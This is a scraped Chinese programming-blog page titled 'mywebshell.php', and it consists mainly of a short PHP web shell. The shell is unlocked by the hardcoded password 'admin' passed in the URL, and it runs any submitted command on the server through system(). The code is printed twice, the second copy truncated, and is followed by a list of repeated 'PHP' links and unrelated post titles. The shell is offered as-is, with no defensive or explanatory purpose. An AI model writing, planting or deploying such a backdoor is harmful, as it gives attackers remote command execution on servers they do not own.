//mywebshell.php
来源:互联网 发布:鲸鱼死后爆炸知乎 编辑:程序博客网 时间:2024/04/30 05:46
<?php
session_start();
if (isset($_SESSION['password']) || isset($_GET['password'])) {
$_SESSION['password']= isset($_GET['password'])?$_GET['password']:$_SESSION['password'];
if ($_SESSION['password']=='admin') {
if(isset($_POST['command']) && !empty($_POST['command'])) {
$command=$_POST['command'];
$ret=system($command,$out);
echo "<br>[$out]:[$ret]<hr>";
}
$strform=<<<FORM
<form method="post" action="mywebshell.php">
command:<textarea name="command" rows="5" cols="100"></textarea><br>
<input type="submit">
</form>
FORM;
echo $strform;
}
}
?>
session_start();
if (isset($_SESSION['password']) || isset($_GET['password'])) {
$_SESSION['password']= isset($_GET['password'])?$_GET['password']:$_SESSION['password'];
if ($_SESSION['password']=='admin') {
if(isset($_POST['command']) && !empty($_POST['command'])) {
$command=$_POST['command'];
$ret=system($command,$out);
echo "<br>[$out]:[$ret]<hr>";
}
$strform=<<<FORM
<form method="post" action="mywebshell.php">
command:<textarea name="command" rows="5" cols="100"></textarea><br>
<input type="submit">
</form>
FORM;
echo $strform;
}
}
?>
0 0
- //mywebshell.php
- PHP
- PHP
- php
- php
- PHP
- PHP
- php
- php
- php
- PHP
- php
- php
- php
- PHP
- PHP
- php
- php
- PHP数据类型
- C# 通俗解释网络通信中的“报头”
- SGU 139 Help Needed!(机智)
- Linux进程调度
- 自定义可拖动土司
- //mywebshell.php
- 《暗时间》读书笔记1
- Window10下安装sbt
- C++第三次作业
- LeetCode——017
- get方法实例-登录
- 架构高性能网站秘笈(六)——构建数据缓冲区
- NSURLConnection取消连接
- NSURLConnect的startImmediately如果设置为NO